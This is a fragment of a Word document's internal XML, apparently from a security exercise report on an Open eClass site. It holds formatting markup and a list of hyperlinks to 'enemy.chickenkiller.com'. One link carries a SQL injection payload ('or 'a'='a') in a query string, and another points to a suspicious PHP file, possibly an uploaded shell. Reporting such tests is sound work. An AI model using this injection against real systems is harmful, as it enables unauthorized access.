      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="265.2631578947369" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">etc.</w:t>
      </w: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hyperlink" Target="http://enemy.chickenkiller.com/modules/admin/commondocs.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://enemy.chickenkiller.com/0xyg3n-ellak.php" TargetMode="External"/><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maellak/openeclass" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image08.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image05.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://users.enemy.chickenkiller.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://users.enemy.chickenkiller.com/catalogue.php?name=SysAdministrator%27%20or%20%27a%27=%27a" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image07.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/></Relationships>
</file>